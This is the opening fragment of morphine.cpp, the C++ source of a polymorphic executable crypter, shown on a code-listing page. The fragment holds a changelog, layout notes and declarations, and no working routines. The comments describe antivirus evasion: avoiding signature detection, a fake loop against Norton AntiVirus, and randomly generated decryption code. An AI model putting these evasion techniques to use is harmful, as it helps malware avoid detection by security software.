📄 morphine.cpp
字号:
#include <windows.h>
#include <winnt.h>
#include <imagehlp.h>
#include <time.h>
#include <iostream>
#include <tchar.h>
//if RUBBISH_NOPS defined, inserted rubbish are nops only (good for debugging)
//#define RUBBISH_NOPS
//#define STATIC_CONTEXT
//ORIGINAL
//this is how our new PE loox like:
//
//CodeSection:
//0..0x10: jmp GetProcAddress+jmp LoadLibrary+pad
//0x10..0x10+KeySize:Key
//0x10+KeySize..0x10+KeySize+sizeof(DynLoader):DynLoader
//0x10+KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//
//Changelog 1.2a
//moved import function jmps (getprocaddress, loadlibrary) to the end of initdata/polymorphic loader to
//prevent AV detection (code section started with ..000000FF2534.. which was a signature):
//implemented several variants of each jmp to import section (getprocaddress, loadlibrary) and added fixups
//this is how our new PE loox like:
//
//CodeSection:
//0x0..KeySize:Key
//KeySize..KeySize+sizeof(DynLoader):DynLoader
//KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.2b
//- some random data (CoderRoller1) into encryption routine (DynCoder and Decoder)
//- data section eliminated (too risky to have it)
//- minor bug fixes
//
//this is how our new PE loox like:
//
//CodeSection:
//0: Rubbish
//KeyPtr..KeyPtr+KeySize:Key
//KeyPtr+KeySize..KeyPtr+KeySize+sizeof(DynLoader):DynLoader
//KeyPtr+KeySize+sizeof(DynLoader): code
//code+sizeof(code): host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.3
//- polycode liposuction
//- polycode instruction naming
//Changelog 1.4
//- DLL SUPPORT!!!
//- well some hacks are here, so nobody can say that the code is correct - see DynLoader
//- minor bugfixes
//+ .edata section after .tls
//Changelog 1.5
//- polycode improved
//Changelog 1.6
//- polycode shrinked
//- dynloader decrypts main data
//Changelog 1.7
//- secondary encryption routine has variable-length key
//Changelog 1.8
//- polycode shrinked
//Changelog 1.9
//- icon + XP manifest support
//Changelog 2.0
//- secondary encryption routine is randomly generated
//- resource support for DLLs
//- fake loop against Norton AntiVirus
//Changelog 2.1
//- FSG 2.0 exe packer support
//Changelog 2.2
//- support for some other exe packers - Mew 1.1
//Changelog 2.3
//- fixed two serious bugz
//Changelog 2.4
//- better support for VB programs
//- support for end of file overlay data
//Changelog 2.5
//- bugfix in TLS support
//Changelog 2.6
//- bugfix in TLS support number 2
//Changelog 2.7
//- better DLL handling -> support for NT4 DLLs
//if you need sum PEB, TEB structures (like in DynLoader)
//try look at these links:
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/TEB.html
//http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html
//we need a dos stub
//that's the common dos prog writing "This program cannot be run in DOS mode"
const BYTE DosStub[0x38]
={0xBA,0x10,0x00,0x0E,0x1F,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x90,0x90,
0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x6D,0x75,0x73,
0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x75,0x6E,0x64,0x65,0x72,0x20,0x57,
0x69,0x6E,0x33,0x32,0x0D,0x0A,0x24,0x37};
//import section constants
#define NumberOfDLL 1 //number of dlls
#define NumberOfImports 2 //number of funcs
#define Kernel32Name "kernel32.dll" //name of dll
#define NtdllName "ntdll.dll" //name of ntdll.dll
#define GetProcAddressName "GetProcAddress"//name of funct1
#define LoadLibraryName "LoadLibraryA" //name of func2
#define Kernel32Size 12 //length of dll name
#define GetProcAddressSize 14 //length of func1 name
#define LoadLibrarySize 12 //length of func2 name
//polymorphic instruction indexes
#define PII_BEGIN 0
#define PII_POLY_BEGIN PII_BEGIN
#define PII_POLY_PUSHAD PII_POLY_BEGIN
#define PII_POLY_MOV_REG_LOADER_SIZE PII_POLY_PUSHAD+1
#define PII_POLY_MOV_REG_LOADER_ADDR PII_POLY_MOV_REG_LOADER_SIZE+1
#define PII_CODER_BEGIN PII_POLY_MOV_REG_LOADER_ADDR+1
#define PII_CODER_CALL_GET_EIP PII_CODER_BEGIN+1
#define PII_CODER_GET_EIP PII_CODER_CALL_GET_EIP+1
#define PII_CODER_FIX_DST_PTR PII_CODER_GET_EIP+1
#define PII_CODER_KEY_START PII_CODER_FIX_DST_PTR+1
#define PII_CODER_MOV_REG_KEY PII_CODER_KEY_START
#define PII_CODER_FIX_SRC_PTR PII_CODER_MOV_REG_KEY+1
#define PII_CODER_CODE PII_CODER_FIX_SRC_PTR+1
#define PII_CODER_LOAD_KEY_TO_REG PII_CODER_CODE
#define PII_CODER_TEST_KEY_END PII_CODER_LOAD_KEY_TO_REG+1
#define PII_CODER_JZ_CODER_BEGIN PII_CODER_TEST_KEY_END+1
#define PII_CODER_ADD_DATA_IDX PII_CODER_JZ_CODER_BEGIN+1
#define PII_CODER_XOR_DATA_REG PII_CODER_ADD_DATA_IDX+1
#define PII_CODER_STORE_DATA PII_CODER_XOR_DATA_REG+1
#define PII_CODER_INC_SRC_PTR PII_CODER_STORE_DATA+1
#define PII_CODER_LOOP_CODER_CODE PII_CODER_INC_SRC_PTR+1
#define PII_CODER_END PII_CODER_LOOP_CODER_CODE+1
#define PII_POLY_JMP_DYNLOADER PII_CODER_END+1
#define PII_POLY_END PII_POLY_JMP_DYNLOADER
#define PII_END PII_POLY_END
//other consts
#define MaxPolyCount 20 //maximum variants for one instruction
#define InitInstrCount PII_END+1 //polymorphic loader instruction count
#define RawDataAlignment 0x200 //alignment of SizeOfRawData
#define DosStubEndSize 0x88 //0x100 - SizeOf(DosStub)
//image type const
#define IMAGE_TYPE_EXE 0
#define IMAGE_TYPE_DLL 1
#define IMAGE_TYPE_SYS 2
#define IMAGE_TYPE_UNKNOWN 0xFFFFFFFF
//this dword is at the end of DYN_LOADER in decoded form
#define DYN_LOADER_END_MAGIC 0xC0DEC0DE
#define DYN_LOADER_DEC_MAGIC 0x1EE7C0DE
//registers
#define REG_EAX 0
#define REG_ECX 1
#define REG_EDX 2
#define REG_EBX 3
#define REG_ESP 4
#define REG_EBP 5
#define REG_ESI 6
#define REG_EDI 7
#define REG_NON 255
#define Reg8Count 8
#define Reg16Count 8
#define Reg32Count 8
#define RT_XP_MANIFEST 24
//our type for all about tls section
typedef struct _IMAGE_TLS_DIRECTORY__ {
DWORD StartAddressOfRawData;
DWORD EndAddressOfRawData;
DWORD AddressOfIndex; // PDWORD
DWORD AddressOfCallBacks; // PIMAGE_TLS_CALLBACK *
DWORD SizeOfZeroFill;
DWORD Characteristics;
} IMAGE_TLS_DIRECTORY__, *PIMAGE_TLS_DIRECTORY__;
//our type for all about tls section
typedef struct _TLS_COPY
{
PIMAGE_DATA_DIRECTORY Directory;
PIMAGE_TLS_DIRECTORY__ SectionData;
DWORD RawData;
DWORD RawDataLen,Index;
PCHAR Callbacks;
DWORD CallbacksLen;
}TLS_COPY;
//one pseudo-instruction (p-i) from polymorphic engine (can contain more than one x86 instruction)
typedef struct _INSTRUCTION
{
BYTE Len; //opcode length
BYTE Fix1,Fix2,Fix3,Fix4; //bytes indexes for fixup
CHAR Code[31]; //opcode
}INSTRUCTION;
//a list of p-i, we will chose one each time and put it into a code
typedef struct
{
BYTE Count,Index; //number of p-i and number of the chosen
DWORD VirtualAddress; //address of instruction in CODE section
INSTRUCTION Vars[MaxPolyCount]; //the list
}VAR_INSTRUCTION;
typedef struct _RESOURCE_TABLE_DIRECTORY_ENTRY{
IMAGE_RESOURCE_DIRECTORY Table;
IMAGE_RESOURCE_DIRECTORY_ENTRY Directory;
}RESOURCE_TABLE_DIRECTORY_ENTRY, *PRESOURCE_TABLE_DIRECTORY_ENTRY;
typedef struct _ICON_DIRECTORY_ENTRY{
BYTE Width;
BYTE Height;
BYTE ColorCount;
BYTE Reserved;
WORD Planes;
WORD BitCount;
WORD BytesInRes1;
WORD BytesInRes2;
WORD ID;
}ICON_DIRECTORY_ENTRY, *PICON_DIRECTORY_ENTRY;
typedef struct _ICON_DIRECTORY{
WORD Reserved;
WORD ResType;
WORD Count;
ICON_DIRECTORY_ENTRY Entries[32];
}ICON_DIRECTORY, *PICON_DIRECTORY;
enum IMAGE_TYPE { itExe,itDLL,itSys};
typedef DWORD (__stdcall *TEncoderProc)(void * AAddr);
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
PIMAGE_EXPORT_DIRECTORY pimage_export_directory;
IMAGE_DOS_HEADER DosHeader;
CHAR DosStubEnd[DosStubEndSize];
IMAGE_NT_HEADERS NtHeaders;
HANDLE FileHandle,MainFile;
char InputFileName[255];
char OutputFileName[255];
char Options[64];
DWORD NumBytes,TotalFileSize,MainSize,LoaderSize;
DWORD VirtLoaderData,VirtMainData,VirtKey,InitSize,KeyPtr;
DWORD AnyDWORD,LoaderPtr,TlsSectionSize,Delta,HostImageBase;
DWORD HostSizeOfImage,HostCharacteristics;
DWORD ReqImageBase,RandomValue,ExportSectionSize;
DWORD CurVirtAddr,CurRawData,ExportRVADelta;
DWORD HostExportSectionVirtualAddress;
DWORD ExportNamePointerRVAOrg,ExportAddressRVAOrg;
DWORD ImportSectionDataSize,HostImportSectionSize,ImportSectionDLLCount;
DWORD HostImportSectionVirtualAddress,InitcodeThunk;
DWORD CodeSectionVirtualSize,LoaderRealSize;
DWORD MainRealSize,MainRealSize4,LogCnt,MainDataDecoderLen;
DWORD DynLoaderDecoderOffset,LdrPtrCode,LdrPtrThunk;
DWORD ResourceSectionSize,HostResourceSectionSize;
//DWORD ResourceIconGroupDataSize
DWORD HostResourceSectionVirtualAddress;
//DWORD ResourceXPMDirSize;
DWORD AfterImageOverlaysSize;
IMAGE_SECTION_HEADER CodeSection;
IMAGE_SECTION_HEADER ExportSection;
IMAGE_SECTION_HEADER TlsSection;
IMAGE_SECTION_HEADER ImportSection;
IMAGE_SECTION_HEADER ResourceSection;
IMAGE_IMPORT_DESCRIPTOR ImportDesc;
IMAGE_IMPORT_DESCRIPTOR NullDesc;
PIMAGE_IMPORT_DESCRIPTOR PImportDesc;
IMAGE_THUNK_DATA ThunkGetProcAddress;
IMAGE_THUNK_DATA ThunkLoadLibrary;
//WORD NullWord;
WORD KeySize,TrashSize,Trash2Size,HostSubsystem;
PCHAR MainData,MainDataCyp,LoaderData,Key,InitData,Trash,Trash2;
PCHAR ExportData,ImportSectionData,ResourceData;
PCHAR MainDataEncoder,MainDataDecoder,AfterImageOverlays;
char *PB,*PB2,*PB3,*PB4,*DynLoaderSub,*LdrPtr,*MainDataDecPtr;
BOOL TlsSectionPresent,ExportSectionPresent,Quiet,DynamicDLL;
BOOL ResourceSectionPresent,SaveIcon,SaveOverlay,OverlayPresent;
TLS_COPY TlsCopy;
IMAGE_TLS_DIRECTORY__ TlsSectionData;
IMAGE_TYPE ImageType;
//DWORD * DynLoaderJmp;
PIMAGE_RESOURCE_DIRECTORY ResourceRoot;
PIMAGE_RESOURCE_DIRECTORY ResourceIconGroup;
PIMAGE_RESOURCE_DIRECTORY ResourceXPManifest;
PIMAGE_RESOURCE_DIRECTORY_ENTRY ResourceDirEntry;
TEncoderProc EncoderProc;
//---------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -